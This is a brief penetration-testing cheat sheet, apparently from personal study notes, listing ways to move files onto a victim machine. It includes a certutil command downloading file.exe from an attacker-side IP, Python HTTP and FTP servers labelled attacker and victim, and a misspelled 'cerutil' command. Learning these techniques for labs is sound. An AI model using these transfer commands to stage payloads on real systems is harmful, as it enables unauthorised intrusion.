File Transfers
PRACTICE PRACTICE ! PRACTICE ! !
$ cerutil.exe -urlcache -f http://192.168.169.131:4444/file.exe file.exe
$ python3 -m http.server 80
$ Navigate directly to the file via browser - RDP Access
$ python -m pyftpdlib 21 <Attacker Machine> | ftp 10.10.10.x <Victim>
Last updated